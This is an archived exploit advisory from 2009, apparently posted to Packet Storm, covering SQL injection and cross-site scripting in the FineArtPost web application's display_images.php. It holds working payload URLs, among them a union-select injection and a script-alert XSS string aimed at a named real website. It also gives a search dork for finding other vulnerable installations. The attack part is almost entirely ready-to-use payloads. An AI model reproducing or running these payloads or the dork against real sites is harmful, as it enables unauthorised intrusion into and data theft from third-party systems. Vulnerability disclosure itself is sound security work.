FineArtPost SQL Injection / XSS

2009-09-15T00:00:00
ID PACKETSTORM:81307
Type packetstorm
Reporter OoN_Boy
Modified 2009-09-15T00:00:00

Description

                                        
                                            ` -------+AntiSecurity[dot]Org-------------  
==================================================================  
Title : FineArtPost SQL Injection & XSS Vulnerability  
Software : FineArtPost  
Vendor : http://www.fineartpost.com  
Author : OoN_Boy  
Blog : http://oon.blogspot.com  
Web : http://oonboy.info  
==================================================================  
[o] Vulnerable file  
display_images.php  
==================================================================  
[o] Exploit  
sql  
http://target.com/[path]/display_images.php?u_id=[SQL]  
xss  
http://target.com/[path]/display_images.php?u_id=[Xss]  
==================================================================  
[0] Poc  
http://www.ctbauer.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--  
http://www.ctbauer.com/public/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22  
==================================================================  
[o] Dork  
"Powered by FineArtPost"  
==================================================================  
[O] Special Greetz  
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -  
Vrs-hCk, NoGe, h4ntu, Opay, Ipay, Paman, reel, H312Y, pizzyroot,  
xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, kaka11,  
==================================================================  
Mohon Maaf lahir batin all maaf kalo banyak salah kata selama ini  
pensiun mode on :))`